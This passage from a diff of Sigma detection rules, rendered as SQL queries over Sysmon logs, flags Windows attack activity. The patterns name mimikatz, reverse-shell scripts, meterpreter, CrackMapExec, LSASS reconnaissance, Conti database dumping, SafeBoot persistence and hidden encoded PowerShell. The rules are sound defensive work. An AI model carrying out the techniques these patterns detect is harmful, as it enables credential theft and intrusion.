ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "attack.t1562.001" ], - "filename": "proc_creation_win_malware_dridex.yml" - }, - { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE '%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_progname.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Potential Conti Ransomware Database Dumping Activity", - "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects a command used by conti to dump database", - "author": "frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PUA - NSudo Execution", - "id": "771d1eb5-9587-4568-95fb-9ec44153a012", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", "status": "experimental", - "description": "Detects the use of NSudo tool for command execution", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use by administrators" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\NSudo.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLC.exe' ESCAPE '\\' OR Image LIKE '%\\\\NSudoLG.exe' ESCAPE '\\') OR OriginalFileName IN ('NSudo.exe', 'NSudoLC.exe', 'NSudoLG.exe')) AND (CommandLine LIKE '%-U:S %' ESCAPE '\\' OR CommandLine LIKE '%-U:T %' ESCAPE '\\' OR CommandLine LIKE '%-U:E %' ESCAPE '\\' OR CommandLine LIKE '%-P:E %' ESCAPE '\\' OR CommandLine LIKE '%-M:S %' ESCAPE '\\' OR CommandLine LIKE '%-M:H %' ESCAPE '\\' OR CommandLine LIKE '%-U=S %' ESCAPE '\\' OR CommandLine LIKE '%-U=T %' ESCAPE '\\' OR CommandLine LIKE '%-U=E %' ESCAPE '\\' OR CommandLine LIKE '%-P=E %' ESCAPE '\\' OR CommandLine LIKE '%-M=S %' ESCAPE '\\' OR CommandLine LIKE '%-M=H %' ESCAPE '\\' OR CommandLine LIKE '%-ShowWindowMode:Hide%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nsudo.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "DLL Sideloading by Microsoft Defender", - "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Suspicious Minimized MSEdge Start", - "id": "94771a71-ba41-4b6e-a757-b531372eaab6", - "status": "test", - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "status": "experimental", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%start /min msedge%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_msedge_minimized_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Atbroker Execution", - "id": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "author": "Mateusz Wydra, oscd.community", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Legitimate, non-default assistive technology applications execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%AtBroker.exe' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%animations%' ESCAPE '\\' OR CommandLine LIKE '%audiodescription%' ESCAPE '\\' OR CommandLine LIKE '%caretbrowsing%' ESCAPE '\\' OR CommandLine LIKE '%caretwidth%' ESCAPE '\\' OR CommandLine LIKE '%colorfiltering%' ESCAPE '\\' OR CommandLine LIKE '%cursorscheme%' ESCAPE '\\' OR CommandLine LIKE '%filterkeys%' ESCAPE '\\' OR CommandLine LIKE '%focusborderheight%' ESCAPE '\\' OR CommandLine LIKE '%focusborderwidth%' ESCAPE '\\' OR CommandLine LIKE '%highcontrast%' ESCAPE '\\' OR CommandLine LIKE '%keyboardcues%' ESCAPE '\\' OR CommandLine LIKE '%keyboardpref%' ESCAPE '\\' OR CommandLine LIKE '%magnifierpane%' ESCAPE '\\' OR CommandLine LIKE '%messageduration%' ESCAPE '\\' OR CommandLine LIKE '%minimumhitradius%' ESCAPE '\\' OR CommandLine LIKE '%mousekeys%' ESCAPE '\\' OR CommandLine LIKE '%Narrator%' ESCAPE '\\' OR CommandLine LIKE '%osk%' ESCAPE '\\' OR CommandLine LIKE '%overlappedcontent%' ESCAPE '\\' OR CommandLine LIKE '%showsounds%' ESCAPE '\\' OR CommandLine LIKE '%soundsentry%' ESCAPE '\\' OR CommandLine LIKE '%stickykeys%' ESCAPE '\\' OR CommandLine LIKE '%togglekeys%' ESCAPE '\\' OR CommandLine LIKE '%windowarranging%' ESCAPE '\\' OR CommandLine LIKE '%windowtracking%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingtimeout%' ESCAPE '\\' OR CommandLine LIKE '%windowtrackingzorder%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_atbroker.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "HackTool - Htran/NATBypass Execution", - "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090", - "attack.s0040" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Recon Activity Using DriverQuery.EXE", - "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", "status": "experimental", - "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.discovery" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_driverquery_recon.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Renamed PsExec Service Execution", - "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", - "status": "experimental", - "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", + "status": "test", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Regsvr32 Command Line Without DLL", - "id": "50919691-7302-437f-8e10-1fe088afa145", + "title": "Potential MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574", - "attack.execution" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_no_dll.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "Shadow Copies Deletion Using Operating Systems Utilities", - "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", - "status": "stable", - 